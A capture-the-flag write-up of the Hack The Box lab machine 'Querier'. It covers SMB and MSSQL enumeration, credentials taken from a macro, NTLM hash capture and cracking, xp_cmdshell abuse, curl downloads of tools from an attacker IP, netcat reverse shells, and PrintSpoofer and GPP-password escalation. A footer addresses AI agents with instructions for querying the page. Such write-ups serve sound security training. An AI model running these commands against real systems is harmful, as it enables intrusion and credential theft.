# HTB - Queier ## Machine Info Querier is a medium difficulty Windows box which has an Excel spreadsheet in a world-readable file share. The spreadsheet has macros, which connect to MSSQL server running on the box. The SQL server can be used to request a file through which NetNTLMv2 hashes can be leaked and cracked to recover the plaintext password. After logging in, PowerUp can be used to find Administrator credentials in a locally cached group policy file. ## Enumeration *** **Scope** > IP Address: 10.10.10.125 **Nmap Scan** ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade] └─$ nmap -p- --min-rate 10000 $ip -Pn PORT STATE SERVICE REASON 135/tcp open msrpc syn-ack 139/tcp open netbios-ssn syn-ack 445/tcp open microsoft-ds syn-ack 1433/tcp open ms-sql-s syn-ack 5985/tcp open wsman syn-ack ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ nmap -p135,139,445,1433,5985 -sCV $ip -Pn -oN Nmap/script-scan PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM |_ssl-date: 2024-07-11T13:38:17+00:00; +7s from scanner time. | ms-sql-ntlm-info: | 10.10.10.125:1433: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: QUERIER | DNS_Domain_Name: HTB.LOCAL | DNS_Computer_Name: QUERIER.HTB.LOCAL | DNS_Tree_Name: HTB.LOCAL |_ Product_Version: 10.0.17763 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2024-07-11T13:34:28 |_Not valid after: 2054-07-11T13:34:28 | ms-sql-info: | 10.10.10.125:1433: | Version: | name: Microsoft SQL Server 2017 RTM | number: 14.00.1000.00 | Product: Microsoft SQL Server 2017 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2024-07-11T13:38:13 |_ start_date: N/A |_clock-skew: mean: 6s, deviation: 0s, median: 6s ``` ``` * Open ports: 135,139,445,1433,5985 * Services: RPC - SMB - MSSQL - winRM * Versions: Microsoft SQL Server 2017 * Important Notes: QUERIER.HTB.LOCAL ``` **RPC Enumeration** ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ rpcclient -U "%" $ip rpcclient $> enumdomusers do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED rpcclient $> srvinfo do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED ``` **SMB Enumeration** `smbclient` managed to get results but `CME` failed, The share `Reports` is not standard share, So let's explore it ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ smbclient -N -L //$ip Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Reports Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ crackmapexec smb $ip -u '' -p '' --shares SMB 10.10.10.125 445 QUERIER [+] HTB.LOCAL\: SMB 10.10.10.125 445 QUERIER [-] Error enumerating shares: STATUS_ACCESS_DENIED ``` I mount the share to my kali machine to explore it easily ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ sudo mount -t cifs "\\\\$ip\\Reports" ./mount Password for root@\\10.10.10.125\Reports: ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ ls mount 'Currency Volume Report.xlsm' ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ file mount/Currency\ Volume\ Report.xlsm mount/Currency Volume Report.xlsm: Microsoft Excel 2007+ ``` ## Initial Access *** ### **Shell as reporting** I searched online for this file extension, and I found that It's Excel file macros enabled which contain `visual basic` script I searched for a tool that can extract the script from `xslm` file and a found this one: {% embed url="" %}
The macros script simply has a connection string to connect to database and execute some SQL query ```vb Set conn = New ADODB.Connection conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6" conn.ConnectionTimeout = 10 conn.Open ``` So, the credentials are `reporting:PcwTWTHRwryjc$c6`, Let's connect to mssql database Confirm access with `CME` ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ crackmapexec mssql $ip -u reporting -p 'PcwTWTHRwryjc$c6' -d volume MSSQL 10.10.10.125 1433 None [*] None (name:10.10.10.125) (domain:volume) MSSQL 10.10.10.125 1433 None [+] volume\reporting:PcwTWTHRwryjc$c6 ``` ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ impacket-mssqlclient QUERIER/reporting:'PcwTWTHRwryjc$c6'@$ip -db volume -windows-auth SQL (QUERIER\reporting reporting@volume)> ``` I tried these credentials against other protocols `RPC`, `SMB` but it didn't authenticate me although I have valid credentials ```BASH ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ crackmapexec smb $ip -u reporting -p 'PcwTWTHRwryjc$c6' SMB 10.10.10.125 445 QUERIER [-] HTB.LOCAL\reporting:PcwTWTHRwryjc$c6 STATUS_NO_LOGON_SERVERS ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ crackmapexec winrm $ip -u reporting -p 'PcwTWTHRwryjc$c6' HTTP 10.10.10.125 5985 QUERIER [*] http://10.10.10.125:5985/wsman WINRM 10.10.10.125 5985 QUERIER [-] HTB.LOCAL\reporting:PcwTWTHRwryjc$c6 ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ rpcclient -U "reporting%PcwTWTHRwryjc\$c6" $ip rpcclient $> enumdomusers result was NT_STATUS_CONNECTION_DISCONNECTED ``` ### **Shell as mssql-svc** One possible attack from mssql is to connect to remote smb server and get the hash of the service account of the database. ```bash SQL (QUERIER\reporting reporting@volume)> EXEC master..xp_dirtree '\\10.10.16.3\share\' ``` Start smb server and wait for the hash ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ impacket-smbserver -smb2support share . [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] mssql-svc::QUERIER:aaaaaaaaaaaaaaaa:19a983f61b035d9c0dfecd82a3086e51:0101000000000000002bd76ddad3da01464386040bb50e2a000000000100100062006400620066006800460050005a000300100062006400620066006800460050005a0002001000710045006b00760063004a0079006f0004001000710045006b00760063004a0079006f0007000800002bd76ddad3da010600040002000000080030003000000000000000000000000030000046ff56ce98fc5308db7c4a5d9d52dc999fdd9105da31e9931733c94f2e971a8f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003300000000000000000000000000 ```
Crack with `hashcat` ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt MSSQL-SVC::QUERIER:aaaaaaaaaaaaaaaa:19a983f61b035d9c0dfecd82a3086e51:0101000000000000002bd76ddad3da01464386040bb50e2a000000000100100062006400620066006800460050005a000300100062006400620066006800460050005a0002001000710045006b00760063004a0079006f0004001000710045006b00760063004a0079006f0007000800002bd76ddad3da010600040002000000080030003000000000000000000000000030000046ff56ce98fc5308db7c4a5d9d52dc999fdd9105da31e9931733c94f2e971a8f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003300000000000000000000000000:corporate568 Session..........: hashcat Status...........: Cracked ``` Authenticate with this credentials `MSSQL-SVC:corporate568`, I can see from `CME` that we have admin privileges over `mssql` instance ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ crackmapexec mssql $ip -u 'MSSQL-SVC' -p 'corporate568' -d volume MSSQL 10.10.10.125 1433 None [+] volume\MSSQL-SVC:corporate568 (Pwn3d!) ``` Connect to the database as that user ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ impacket-mssqlclient QUERIER/MSSQL-SVC:'corporate568'@$ip -windows-auth -db volume SQL (QUERIER\mssql-svc dbo@volume)> ``` Confirm admin pivileges ```SQL SQL (QUERIER\mssql-svc dbo@volume)> select is_srvrolemember('sysadmin') - 1 ``` I want to execute system command with `xp_cmdshell` but I need to enable it first ```SQL SQL (QUERIER\mssql-svc dbo@volume)> EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE [*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. [*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. ``` ```BASH SQL (QUERIER\mssql-svc dbo@volume)> xp_cmdshell "whoami" output ----------------- querier\mssql-svc ``` ```BASH SQL (QUERIER\mssql-svc dbo@volume)> xp_cmdshell "dir C:\Users" output ---------------------------------------------------- Directory of C:\Users 01/29/2019 12:41 AM . 01/29/2019 12:41 AM .. 01/28/2019 11:17 PM Administrator 01/29/2019 12:42 AM mssql-svc 01/28/2019 11:17 PM Public ``` ```bash SQL (QUERIER\mssql-svc dbo@volume)> xp_cmdshell "type C:\Users\mssql-svc\Desktop\user.txt" output -------------------------------- a113d259fb6b81c18xxxxxxxxxxxxxxxxxx ``` > User Flag: a113d259fb6b81c18xxxxxxxxxxxxxxxxxx *** ## Privilege Escalation ### Path 1 The service account `mssql-svc` often has `SeImpersonatePrivilege` & `SeAssignPrimaryTokenPrivilege` privileges which can be used to escalate to `SYSTEM` account ```bash SQL (QUERIER\mssql-svc dbo@volume)> xp_cmdshell "whoami /priv" output -------------------------------------------------------------------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled ``` * We can use `RoguePotato` or `PrintSpoofer` tools and `nc.exe` to execute this attack First download them to the windows machine ```bash SQL (QUERIER\mssql-svc dbo@volume)> xp_cmdshell "curl 10.10.16.3/nc.exe -o C:\Users\mssql-svc\nc.exe" SQL (QUERIER\mssql-svc dbo@volume)> xp_cmdshell "curl 10.10.16.3/PrintSpoofer.exe -o C:\Users\mssql-svc\PrintSpoofer.exe" ``` Execute `PrintSpoofer.exe` with the following syntax and start `nc` listener on kali machine to receive connection back ```bash xp_cmdshell ".\PrintSpoofer.exe -c "c:\Users\mssql-svc\nc.exe 10.10.16.25 1337 -e PowerShell"" ``` ```bash ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ rlwrap nc -lvnp 1337 listening on [any] 1337 ... connect to [10.10.16.3] from (UNKNOWN) [10.10.10.125] 49680 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32> whoami whoami nt authority\system ```
```powershell PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt 42be413e54f4658662xxxxxxxxxxxxxx ``` > Root Flag: 42be413e54f4658662xxxxxxxxxxxxxx ### Path2 Get a shell to easily explore the system for possible escalation paths ```bash SQL (QUERIER\mssql-svc dbo@volume)> xp_cmdshell "C:\Users\mssql-svc\nc.exe 10.10.16.3 443 -e PowerShell" ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier] └─$ rlwrap nc -lvnp 443 listening on [any] 443 ... connect to [10.10.16.3] from (UNKNOWN) [10.10.10.125] 49681 PS C:\Windows\system32> ``` Download `PowerUp.ps1` which search for misconfigurations and weaknesses on the system ```powershell PS C:\Users\mssql-svc> curl 10.10.16.3/PowerUp.ps1 -o .\PowerUp.ps1 ``` ```powershell PS C:\Users\mssql-svc> . .\PowerUp.ps1 PS C:\Users\mssql-svc> Invoke-AllChecks Changed : {2019-01-28 23:12:48} UserNames : {Administrator} NewName : [BLANK] Passwords : {MyUnclesAreMarioAndLuigi!!1!} File : C:\ProgramData\Microsoft\Group\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml Check : Cached GPP Files ``` I downloaded `RunasCs.exe` tool to get a shell with another user - `administrator` - in my case ```powershell PS C:\Users\mssql-svc> curl 10.10.16.3/RunasCs.exe -o .\RunasCs.exe ``` ```powershell PS C:\Users\mssql-svc> .\RunasCs.exe administrator 'MyUnclesAreMarioAndLuigi!!1!' powershell -r 10.10.16.3:1337 ``` And get a shell as `admin` :)
```powershell PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt 42be413e54f4658662xxxxxxxxxxxxxx ``` > Root Flag: 42be413e54f4658662xxxxxxxxxxxxxx --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blind0bandit.gitbook.io/blog/windows-machines/medium/htb-queier.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.